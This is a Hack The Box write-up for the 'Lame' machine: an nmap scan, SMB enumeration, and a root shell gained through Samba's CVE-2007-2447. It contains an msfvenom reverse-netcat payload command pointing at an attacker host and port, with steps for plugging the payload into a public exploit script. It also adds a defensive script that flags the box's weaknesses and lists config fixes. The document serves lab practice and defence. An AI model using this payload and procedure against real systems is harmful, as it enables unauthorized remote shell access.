Lame - Manual Exploit
Difficulty = Easy
Running our nmap scan, we have:
# Nmap 7.94 scan initiated Sat Jul 29 07:48:57 2023 as: nmap -p21,22,139,445 -sCV -T4 -oN nmap.txt -Pn 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-07-29T07:49:32-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m11s, deviation: 2h49m47s, median: 7s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 29 07:50:03 2023 -- 1 IP address (1 host up) scanned in 65.54 seconds
We have anonymous access to FTP, but we can't put files inside it, and there are no files inside it either.
Using smbmap to enumerate shares, we have READ, WRITE permissions on only one share (tmp).
Connecting to the share with smbclient, we have:
We can go ahead and download all of these files. Only 2 were permitted for us to download. Nothing still seems interesting in these files.
Checking the Samba version, I found out it is vulnerable to "Username map script" Command Execution (CVE-2007-2447), so we can go ahead and download the exploit from here.
- Make sure pysmb is installed: sudo pip2 install pysmb
- Then run this command, replacing LHOST with your tun0 IP address, and copy the shellcode: msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.90 LPORT=1337 -f python
- Replace the default shellcode in the script with it.
- Run the script with python2 and get a reverse shell.
Hell yeah, we got a reverse shell as user root.
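From the defender's side, the three weaknesses this box chains (anonymous FTP, guest SMB sessions with signing disabled, and a Samba build inside the CVE-2007-2447 range) are all visible in the nmap output above. The script below is an added example, not part of the original writeup: it triages an nmap -oN report for exactly those findings and pairs each with the config fix. The embedded report is a constructed excerpt of the scan shown above; the finding names and the MITIGATIONS table are my own.

```python
"""Triage an `nmap -sCV -oN` report for the weaknesses this box exposes.

Added example, not part of the original writeup. SAMPLE_NMAP is a
constructed excerpt of the scan output shown above.
"""
import re

SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# CVE-2007-2447 ("username map script") affects Samba 3.0.0 up to 3.0.25rc3;
# the box runs 3.0.20, which sits inside that range.
SAMBA_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)")


def samba_username_map_vulnerable(version):
    """True if a (major, minor, patch) tuple falls in the CVE-2007-2447 range."""
    major, minor, patch = version
    return (major, minor) == (3, 0) and patch < 25


def triage(report):
    """Return a sorted list of finding identifiers for an nmap -oN report."""
    findings = set()
    if "Anonymous FTP login allowed" in report:
        findings.add("ftp-anonymous-login")
    if re.search(r"message_signing:\s*disabled", report):
        findings.add("smb-signing-disabled")
    if "account_used: guest" in report:
        findings.add("smb-guest-session")
    m = SAMBA_RE.search(report)
    if m and samba_username_map_vulnerable(tuple(int(x) for x in m.groups())):
        findings.add("samba-CVE-2007-2447")
    return sorted(findings)


# Finding -> config change that closes it (vsftpd.conf / smb.conf options).
MITIGATIONS = {
    "ftp-anonymous-login": "set anonymous_enable=NO in vsftpd.conf",
    "smb-signing-disabled": "set 'server signing = mandatory' in smb.conf",
    "smb-guest-session": "set 'map to guest = Never' in smb.conf",
    "samba-CVE-2007-2447": "upgrade Samba to 3.0.25+; remove any 'username map script'",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_NMAP):
        print(f"{finding}: {MITIGATIONS[finding]}")
```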